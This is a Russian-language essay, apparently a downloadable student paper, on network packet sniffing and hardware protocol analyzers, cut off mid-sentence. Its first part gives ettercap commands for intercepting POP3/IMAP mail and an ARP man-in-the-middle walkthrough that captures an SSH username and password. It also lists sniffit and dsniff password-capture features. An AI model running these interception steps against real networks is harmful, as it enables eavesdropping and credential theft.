Определение подозрительных пакетов, анализ протоколов сети
Subject: test.
Mime-Version: 1.0.
Content-Type: text/plain; charset=us-ascii.
Content-Transfer-Encoding: 7bit.
.
Hello andrushock,.
.
Test for Softerra.
.
-- .
Best regards,.
Noname mailto: ******@pisem.net.
Далее сообщение демона о принятии письма к отправке и завершение почтовым
сервером соединения.
Для перехвата входящих в локальную сеть электронных писем используем:
./ettercap -Nzds ANY:110 ANY > /root/sniff.pop3
или
./ettercap -Nzds ANY:143 ANY > /root/sniff.imap4
Пример перехвата паролей во время сессии SSH:
На одной машине 192.168.5.21 стоит ettercap (назовем злоумышленник), на
втором 192.168.5.4 sshd (назовем сервер), а на третьем 192.168.5.22
SecureCRT (назовем клиент).
./ettercap -Ndl - выводим список всех ip с МАС-адресами машин в сегменте
локальной сети, запоминаем только МАС-адреса сервера и клиента. Запускаем
сниффер на прослушивание и ждем когда клиент инициализирует сеанс Secure
Shell с сервером и начнется процесс аутентификации. В этом случае машина
злоумышленника является "мостом", через который будет проходить и
расшифровываться на лету весь проходящий траффик между клиентом и сервером.
Вид записи:
./ettercap -za
./ettercap -za 192.168.5.4 192.168.5.22 00:50:BF:03:BC:47 00:A0:24:93:61:3D
Привожу "текстовый скриншот"
ettercap 0.5.4
SOURCE: 192.168.5.22 ? Filter: OFF
doppleganger - illithid (ARP Based) - ettercap
DEST: 192.168.5.4 ? Active Dissector: ON
??? hosts in this LAN (192.168.5.21 : 255.255.255.0)
1) 192.168.5.22:1252 ?? 192.168.5.4:22 | silent | SSH decrypt
Your IP: 192.168.5.21 MAC: 00:50:BF:4A:48:F3 Iface: ed0 Link: not tested
USER: testuser
PASS: softerra
В левом нижнем углу лицезреем уже расшифрованные имя пользователя и его
пароль. Примечание: сетевой интерфейс действительно ed0, так как программа
тестировалась в операционных системах Linux и FreeBSD.
Постоянно выходят новые версии Ettercap, в которых исправляются ошибки
(например, только несколько версий назад исправили "глюк", когда после
работы сетевой интерфейс, на котором был запущен этот сниффер падал),
добавляются новые возможности и переносы на другие операционные системы, в
отличие от программ описанных ниже, работа над которыми уже давно не
ведется, хотя в настоящее время эти анализаторы протоколов являются самыми
популярными.
sniffit Возможности этого сниффера:
. работает на LINUX, SunOS/Solaris, Irix, FreeBSD, BSDi, DEC/OSF,
NetBSD;
. перехват паролей FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP,
SNMP, LDAP, Rlogin, RIP, OSPF, PPTP, MS-CHAP, NFS, VRRP, YP/NIS,
SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker,
Citrix ICA, Symantec pcAnywhere, NAI, Sniffer, Microsoft SMB, Oracle
SQL*Net, Sybase and Microsoft SQL;
. использование конфигурационных файлов для создания фильтров;
. имеет текстовый и псевдографический (основанный на ncurses)
интерфейсы.
dsniff Примечание: эту версию сниффера я не смог поставить на Red Hat Linux
7.0, поэтому пришлось качать более новую, но beta, где как раз исправлена
ошибка компоновки для дистрибутивов Red Hat Linux 6,7.
Возможности этого сниффера:
работает на OpenBSD (i386), Redhat Linux (i386), Solaris (sparc),
FreeBSD, Debian Linux, Slackware Linux, AIX, HP-UX;
. перехват паролей FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP,
SNMP, LDAP, Rlogin, RIP, OSPF, PPTP, MS-CHAP, NFS, VRRP, YP/NIS,
SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker,
Citrix ICA, Symantec pcAnywhere, NAI, Sniffer, Microsoft SMB, Oracle
SQL*Net, Sybase, Microsoft SQL;
. также в этот пакет входит набор "утилит" для перехвата сообщений AOL
Instant Messenger, ICQ 2000, IRC, Yahoo Messenger chat, прослушивания
ssh траффика, флуда локальной сети случайными MAC-адресами,
ограничения пропускной способности соединения, обрыва заданного TCP-
соединения и др.;
. не имеет псевдографического интерфейса.
Аппаратные средства анализа пакетов (протоколов).
Анализаторы протоколов передачи данных.Сегодня оборудование передачи данных
можно найти практически в любом офисе и на каждом промышленном предприятии.
В офисе это различные периферийные устройства для персональных компьютеров
и оборудование передачи данных по корпоративным или территориальным сетям,
на производстве — системы сбора информации и управления. Разнообразие
устройств, обменивающихся данными, растет с каждым днем, однако набор
используемых при этом интерфейсов не претерпел существенных изменений. К
тому же с течением времени отрасль выработала множество приспособлений и
инструментов для тестирования интерфейсов на различном уровне и диагностики
проблем взаимодействия устройств.
Один из самых старых интерфейсов, RS-232, имеет огромное число
разновидностей. Несмотря на то что любой специалист по вычислительной
технике или микроконтроллерам знает его цоколевку наизусть, тем не менее
проблемы могут возникнуть уже на этапе подключения устройств друг к другу.
Особенно часто это бывает вызвано отсутствием информации о том, какие
управляющие сигналы используются, к какому типу относятся устройства
(DTE/DCE), каковы скорость и формат передачи данных. Комплект простейших
устройств, который будет описан ниже, существенно облегчает работу тем,
кому приходится иметь дело с этим интерфейсом.
|[pic] |
Для того чтобы изготовить переходник, совсем не обязательно пользоваться
паяльником — достаточно простого приспособления, с помощью которого
контакты одного разъема можно было бы соединить с контактами другого в
нужной последовательности обычным проводом без пайки. Такой мини-кросс
позволяет не только создать устройство с нужной схемой, но и подобрать
требуемую схему соединения.
|[pic] |
Чтобы понять, почему же обмен не происходит, совсем не обязательно искать
анализатор — для диагностики достаточно простого индикатора, если он
позволяет провести мониторинг основных сигналов. Его двухцветные светодиоды
могут идентифицировать высокий/низкий уровень сигнала, его отсутствие и
линии, по которым ведется передача данных.
Иногда функции мини-кросса и индикатора объединяются. Однако рынок
предлагает и более универсальные приборы (их английское название — breakout
box, специального русского термина пока нет, поэтому мы будем называть их
просто тестерами). Изобилие разновидностей этого вида приборов поражает.
Помимо кроссировки и индикации состояния линий они позволяют отключать или
подключать отдельные линии в процессе отладки,
|[pic] |
подавать на них сигналы определенного уровня, фиксировать наличие на линиях
коротких импульсов. Появившиеся во времена расцвета интерфейса RS-232/V.24,
такие приборы стали настолько популярны, что сегодня производителями
выпускается широкая гамма моделей для последовательных синхронных и
асинхронных (RS-422/423, RS-449/V.36, X.21, V.35), а также параллельного
(Centronics) интерфейсов.
Большинство моделей снабжено встроенным тестером кабелей для проверки или
определения электрической схемы. Некоторые модели имеют встроенный
мультиметр.
|[pic] |
Следующими по уровню сложности являются устройства, выполняющие функции
тестера частоты ошибочных битов/блоков (bit/block error rate, BER/BLER ).
Они позволяют измерить параметры, используемые для оценки качества канала и
его диагностики (количество полученных блоков; долю битов/блоков,
содержащих ошибки; сумму секунд, когда наблюдались ошибки; число случаев
потерь синхронизации; сумму секунд, когда имели место сбои синхронизации;
количество ошибок четности и фрейминга, а также время выполнения теста и
частоту появления ошибок в битах/блоках). Хорошие приборы имеют встроенный
генератор тестовых последовательностей для синтеза
|[pic] |
определенных наборов символов (наиболее часто используются
последовательности «quick brown fox» и «barber poles») или передачи
задаваемого пользователем набора символов. Некоторые приборы имеют опции
для тестирования статистических мультиплексоров (опрос устройств и
управление потоком Xon/Xoff), мониторинга каналов SDLC, работы с
протоколами SNA и X.25 и т. п.
Особое место занимают устройства регистрации, так называемые логгеры, для
фиксации и записи данных в реальном масштабе времени. Сохраненные в их
внутреннем буфере данные можно просмотреть на дисплее логгера или
распечатать с преобразованием в нужную кодовую таблицу (например, ASCII).
|[pic] |
Большинство логгеров реализует и все описанные выше функции. Самые мощные
логгеры имеют алфавитно-цифровой дисплей и полноразмерную клавиатуру для
редактирования и моделирования сообщений. Подготовленные таким образом
сообщения могут использоваться при отладке различных устройств.
Особняком стоят более мощные (и существенно более дорогие) приборы для
анализа протоколов передачи данных по глобальным сетям (WAN). Вообще в
современном мире, после перехода телефонии на цифровые принципы, граница
между данными цифровых телефонных систем и данными вычислительных сетей
|[pic] |
становится все более расплывчатой. В случае PDH/SDH на канальном уровне
отличия между ними вообще не существуют. Они появляются на более высоком
уровне, где используются специфические протоколы. Поскольку все анализаторы
выполнены на базе обычных компьютеров (как правило, это ноутбуки с набором
дополнительных интерфейсных карт), то почти всегда можно найти несколько
однотипных моделей, отличающихся конкретным набором протоколов и ценой.
Некоторые производители идут по пути создания сверхуниверсальных приборов,
которые могут использоваться как в телефонии, так и при передаче данных.
Другие предлагают узкоспециализированные приборы, но за меньшую це
| |  скачать работу |
Определение подозрительных пакетов, анализ протоколов сети |
